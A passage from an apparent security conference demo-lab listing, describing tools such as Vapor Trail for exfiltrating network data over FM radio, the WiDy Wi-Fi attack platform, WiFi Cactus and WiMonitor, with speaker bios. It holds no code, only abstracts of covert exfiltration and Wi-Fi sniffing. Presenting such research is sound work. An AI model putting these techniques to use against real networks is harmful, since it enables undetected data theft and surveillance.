This enables the attacker to avoid any network complexity (air gaps, firewalls and proxies) or network-based monitoring, and still obtain that precious shell!

https://sensepost.com/blog/2016/universal-serial-abuse/ https://github.com/SensePost/USaBUSe

Rogan Dawes
Rogan Dawes is a senior researcher at SensePost and has been hacking since 1998, which, coincidentally, is also the time he settled on a final wardrobe. He used the time he saved on choosing outfits to live up to his colleague’s frequent joke that he has an offline copy of the Internet in his head. Rogan spent many years building web application assessment tools, and is credited as having built one of the first and most widely used intercepting proxies; WebScarab. In recent years, Rogan has turned his attentions towards hardware hacking; and these days many suspect him to be at least part cyborg. A good conversation starter is to ask him where he keeps his JTAG header.

Back to top



Vapor Trail

Galen Alderson

Larry Pesce

Sunday from 1200-1350 at Table Six

Audience: Offense, Defense, Hardware

As red team members and even "evil attackers", we've been finding numerous ways to exfiltrate data from networks with inexpensive hardware: Ethernet, WiFi and cellular (2G, 3G and LTE). The first two are highly detectable, while the latter is expensive and both leave a paper trail. We found a way to use a medium that is right under everypony's nose; low power, broadcast FM radio. With a Raspberry Pi and a length of wire, we can send text and raw binary data with a method nopony (until now) would think to look for. We receive the data with an RTL-SDR, putting our overall hardware budget at $20. In this demo, we will show you how to build and use this system. We'll share tales of the custom software and transmission protocols. You want to see it in action? We've got demos. You want the software? Yep, you can have that too. We're excited to offer Vapor Trail to you, the first FM radio data exfiltration tool. Sure, HAM radio folks have had digital modes for years, but we've done better AND cheaper. We've effectively created our own RF digital mode for pwnage, HAM radio data transfer and redundant communication methods. Why? Because we can. We want to go undetected with current capabilities. Turns out, our approach is quite novel for pulling data right from a network via pcaps or tool output.

http://vaportrail.io/

Galen Alderson
This is Galen Alderson's first conference submission, but not his first contribution to the security industry. Fresh out of high school, Galen still has the new car smell. Galen has many years to become a curmudgeon by getting broken in as an intern at InGuardians.

Larry Pesce
Larry Pesce on the other hand, is almost veteran enough to be a curmudgeon. He has a few more years to go before yelling about kids on his lawn and no-code Extra Class Amateur radio operators. In the meantime, he keeps himself occupied as the Director of Research at InGuardians.

Back to top



WIDY 2.0: WIFI 0WNAGE IN UNDER $5 RELOADED

Vivek Ramachandran

Nishant Sharma

Ashish Bhangale

Sunday from 1000-1150 at Table Five

Audience: Attack and Defense

WiDy is an open source Wi-Fi Attack and Defense platform created to run on the extremely cheap ESP8266 (<$5) IoT platform. We've written a simple framework which you can hack and create your own tools or automate attack/defense tasks. We also provided code to bring the concept of deception to WiFi area. WiDy was launched in Blackhat Asia 2017 Arsenal and received good response from the audience. WiDy 2.0 release contains several major improvements over initial version.

Vivek Ramachandran
Vivek Ramachandran is the Founder and Chief Trainer at Pentester Academy. He discovered the Caffe Latte attack, broke WEP Cloaking - a WEP protection schema, conceptualized enterprise Wi-Fi Backdoors and created Chellam, the world's first Wi-Fi Firewall. He is also the author of multiple five star rated books which have together sold over 13,000+ copies worldwide and have been translated to multiple languages. Vivek started SecurityTube.net in 2007, a YouTube for security which current aggregates the largest collection of security research videos on the web. SecurityTube Training and Pentester Academy now serve thousands of customers from over 90 countries worldwide. He also conducts in-person trainings in the US, Europe and Asia. Vivek's work on wireless security has been quoted in BBC online, InfoWorld, MacWorld, The Register, IT World Canada etc. places. He has spoken/trained at top conferences around the world including Black Hat USA, Europe and Abu Dhabi, Defcon, Hacktivity, Brucon, SecurityByte, SecurityZone, Nullcon, C0C0n etc. Vivek has over a decade of experience in security and has keen interest in the areas of Wireless, Mobile, Network and Web Application Pentesting, Shellcoding, Reversing and Exploit Research. He loves programming in Python, C and Assembly.

Nishant Sharma
Nishant Sharma is a researcher and course creator at Pentester Academy, prior to which he was a core firmware developer at Mojo Networks (previously known as Airtight Networks). He presented WiDy (Under $5 WiFi Hacker Gadget) at Blackhat Asia Arsenal 2017. He has contributed to multiple projects like Vulnerable Router Project and Damn Vulnerable Wordpress. He has also contributed to "Pentest Gadget book" authored by Mr. Vivek Ramachandran. He has a Masters degree in Information Security from IIIT Delhi. Nishant has also published peer-reviewed academic research on HMAC security. His areas of interest include WiFi and IoT security, AD security, forensics and cryptography.

Ashish Bhangale
Ashish Bhangale is a Sr Security Researcher at Pentester Academy. He has 5+ years of experience in Network and Web Application Security. He has previously worked with various law enforcement agencies as a Digital Forensics Investigator. He was responsible for developing and testing the Chigula and Chellam frameworks. He has also created and managed multiple projects like Command Injection & Arbitrary File Upload Vulnerable Web Application OS a collection of vulnerable OSes and Damn Vulnerable Wordpress. He co-presented WiDy (Under $5 WiFi Hacker Gadget) at Blackhat Asia Arsenal 2017. His areas of interest include Forensics, WiFi and AD security.

Back to top



WiFi Cactus

darkmatter

Saturday & Sunday from Saturday 1000-1150, Sunday 1200-1350 at Table Four

Audience: Offense, Defense

With this project you will be able to listen to all Wi-Fi channels at the same time. No more broken or fragmented frames due to channel hopping. It will passively monitor the dangerous WiFis around you giving you metadata and actual data that might be useful.

http://palshack.org/

darkmatter
Darkmatter is a mad scientist who likes to hacks hardware and software. He is particularly obsessed with wireless.

Back to top



WiMonitor - an OpenWRT package for remote WiFi sniffing

Vivek Ramachandran

Nishant Sharma

Ashish Bhangale

Sunday from 1200-1350 at Table One

Audience: Defense

WiMonitor is ready to use OpenWRT package which allows the user to convert an OpenWRT WiFi router into a remote WiFi sniffer. It modifies the LuCI interface to show the task-specific configuration option. With the right configuration, it then captures the WiFi packets using monitor mode (while hopping on configured channels) and sends them to the remote machine as Aruba ERM (Encapsulated Remote Mirroring) packets. This allows the user to observe, capture and analyze traffic from multiple sources (read APs turned into sensors) on one machine (laptop/PC) using off the shelf OpenWRT compatible routers.

Vivek Ramachandran
Vivek Ramachandran is the Founder and Chief Trainer at Pentester Academy. He discovered the Caffe Latte attack, broke WEP Cloaking - a WEP protection schema, conceptualized enterprise Wi-Fi Backdoors and created Chellam, the world's first Wi-Fi Firewall. He is also the author of multiple five star rated books which have together sold over 13,000+ copies worldwide and have been translated to multiple languages. Vivek started SecurityTube.net in 2007, a YouTube for security which current aggregates the largest collection of security research videos on the web. SecurityTube Training and Pentester Academy now serve thousands of customers from over 90 countries worldwide. He also conducts in-person trainings in the US, Europe and Asia. Vivek's work on wireless security has been quoted in BBC online, InfoWorld, MacWorld, The Register, IT World Canada etc. places. He has spoken/trained at top conferences around the world including Black Hat USA, Europe and Abu Dhabi, Defcon, Hacktivity, Brucon, SecurityByte, SecurityZone, Nullcon, C0C0n etc. Vivek has over a decade of experience in security and has keen interest in the areas of Wireless, Mobile, Network and Web Application Pentesting, Shellcoding, Reversing and Exploit Research. He loves programming in Python, C and Assembly.

Nishant Sharma
Nishant Sharma is a researcher and course creator at Pentester Academy, prior to which he was a core firmware developer at Mojo Networks (previously known as Airtight Networks). He presented WiDy (Under $5 WiFi Hacker Gadget) at Blackhat Asia Arsenal 2017. He has contributed to multiple projects like Vulnerable Router Project and Damn Vulnerable Wordpress. He has also contributed to "Pentest Gadget book" authored by Mr. Vivek Ramachandran. He has a Masters degree in Information Security from IIIT Delhi. Nishant has also published peer-reviewed academic research on HMAC security. His areas of interest include WiFi and IoT security, AD security, forensics and cryptography.

Ashish Bhangale
Ashish Bhangale is a Sr Security Researcher at Pentester Academy. He has 5+ years of experience in Network and Web Application Security. He has previously worked with various law enforcement agencies as a Digital Forensics Investigator. He was responsible for developing and testing the Chigula and Chellam frameworks. He has also created and managed multiple projects like Command Injection & Arbitrary File Upload Vulnerable Web Application OS a collection of vulnerable OSes and Damn Vulnerable Wordpress. He co-presented WiDy (Under $5 WiFi Hacker Gadget) at Blackhat Asia Arsenal 2017. His areas of interest include Forensics, WiFi and AD security.

Back to top